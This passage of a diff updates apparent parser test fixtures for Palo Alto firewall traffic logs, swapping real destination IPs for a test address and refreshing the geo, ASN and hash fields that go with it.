04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9122,7 +9149,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BYZjFq0Mi2hPewpUDaO1jY2UNnA=", + "community_id": "1:srwxvEZW6H1Mpn91MNGQ3m3oLbc=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -9160,14 +9187,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284215275Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381958800Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9190,24 +9217,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -9226,7 +9255,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9260,7 +9289,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:l0WoNEsuwN4ml47IyB3IhM2NX6A=", + "community_id": "1:0iXeodSp4IYC9n1wDFrRtPP6sVE=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -9298,14 +9327,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284219921Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381964500Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -9328,27 +9357,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -9367,7 +9395,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9401,7 +9429,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AEtFqIuwxZ9TQ3w9m74nOrboCXE=", + "community_id": "1:vCMdT6zPx0277mqoTE2FybOH35w=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -9439,14 +9467,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284224439Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381969900Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9469,24 +9497,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", + "region_name": "Jilin", "location": { - "lon": 12.1097, - "lat": 43.1479 - }, - "country_iso_code": "IT" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3269, + "number": 4837, "organization": { - "name": "Telecom Italia" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 922, - "ip": "62.211.68.12", + "ip": "175.16.199.1", "packets": 7 }, "rule": { 
@@ -9505,7 +9535,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "panw": { "panos": { "ruleset": "rule1", @@ -9539,7 +9569,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:t42FnU6e46qlRX0ij7ufkKPs3Co=", + "community_id": "1:ZAHA/cNl4DB0CHBQeP70O+Z6U5A=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -9577,14 +9607,14 @@ ], "ip": [ "192.168.0.2", - "62.211.68.12", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284233597Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "ingested": "2021-12-09T13:43:22.381975300Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9607,27 +9637,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -9646,7 +9675,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9680,7 +9709,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AuQEAPptnfXLW8oL/ac3CM4Gnnw=", + "community_id": "1:koetsWC4zZQTKrn1+nSjU/gkrDc=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -9718,14 +9747,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284239621Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381980600Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -9748,24 +9777,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -9784,7 +9815,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9818,7 +9849,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZVsgbE2ux52iF80QIxJN36vdI1M=", + "community_id": "1:iwR1CZKvsg4gfMDn89oFL0+UUeg=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -9856,14 +9887,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284244147Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381985900Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9886,24 +9917,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -9922,7 +9955,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9956,7 +9989,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:p68po3QtexuC2kor01hJgMDKiPM=", + "community_id": "1:R5T3/rbI7qqW/gW0B27FxTTzZVo=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -9994,14 +10027,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284248780Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381991100Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -10024,27 +10057,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -10063,7 +10095,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -10097,7 +10129,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2UbFMV1DsXMB0b/AUotNCCsHm0s=", + "community_id": "1:77gDm3uChN5sMPF96tsLJjK6Bc4=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -10135,14 +10167,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284253282Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381996500Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10165,24 +10197,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3356, + "number": 4837, "organization": { - "name": "Level 3 Parent, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 26786, - "ip": "8.5.1.1", + "ip": "175.16.199.1", "packets": 22 }, "rule": { 
@@ -10201,7 +10235,7 @@ }, "packets": 17 }, - "message": "192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", "panw": { "panos": { "ruleset": "rule1", @@ -10235,7 +10269,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:J6pba/4Qby485gtIOBCJnQ0T04E=", + "community_id": "1:37NWHN30pMMkkJBtH1P8XW+BUWQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -10273,14 +10307,14 @@ ], "ip": [ "192.168.0.2", - "8.5.1.1", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284263711Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", + "ingested": "2021-12-09T13:43:22.382001800Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10303,24 +10337,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -10339,7 +10375,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -10373,7 +10409,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:iSTXT01g3/K5eC8sEHIzTaFShsA=", + "community_id": "1:et0aCyMg4U52CZ4uw4VmHR75jJ8=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -10411,14 +10447,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284269999Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382007400Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", 
